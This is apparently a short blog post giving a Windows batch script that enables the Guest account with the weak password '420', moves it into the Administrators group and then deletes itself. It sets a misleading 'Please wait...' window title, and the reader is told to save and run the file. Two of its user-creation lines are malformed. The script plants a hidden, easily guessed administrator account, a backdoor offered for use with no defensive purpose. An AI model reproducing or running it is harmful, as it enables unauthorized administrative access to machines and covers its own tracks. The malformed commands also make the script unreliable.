Turn Guest Account to Administrator account

echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0



Copy and paste this code and save as anything.bat

Run it you will get a guest account with administrator previllages

0 comments:

Post a Comment